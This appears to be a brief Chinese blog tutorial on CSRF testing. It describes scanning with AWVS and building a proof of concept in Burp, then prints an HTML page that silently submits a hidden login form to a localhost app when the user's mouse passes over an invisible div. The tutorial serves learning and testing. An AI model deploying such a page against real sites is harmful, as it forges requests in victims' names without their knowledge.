CSRF对表单派发事件

1、使用AWVS检测CSRF漏洞

2、使用burp生成poc

3、对poc进行修改

<html>
  <!-- CSRF自动登录poc -->
    <body>
        <script>
            function login(){
                document.getElementById("myForm").submit()
                // <input type="submit" onmouseover="login()" value="tijiao"/>,name值不可以为submit，否则提交失败
            }
        </script>
            <form id="myForm" action="http://localhost/store/user?method=login" method="GET">
                  <input type="hidden" name="username" value="test" />
                  <input type="hidden" name="password" value="test" />
                  <div onmouseover="login()">&nbsp;</div>
            </form>
    </body>
</html>

4、等用户划过指定的div，触发事件，实现登录

5、登录成功

相关阅读:
leetcode刷题-- 4. 贪心
golang 中的引号
记录博客的目的
java返回树形结构的正确姿势
java -jar xxxx.jar --server.port（指定启动端口无效）
Spring 中@NotNull, @NotEmpty和@NotBlank之间的区别是什么？
IntelliJ IDEA远程连接linux，一键上传jar包
linux 运行Jar包时指定启动端口
@Validated注解对单个实体类与List集合的验证
linux -bash: ./startup.sh: /bin/sh^M: 坏的解释器: 没有那个文件或目录

原文地址：https://www.cnblogs.com/smartmsl/p/12461765.html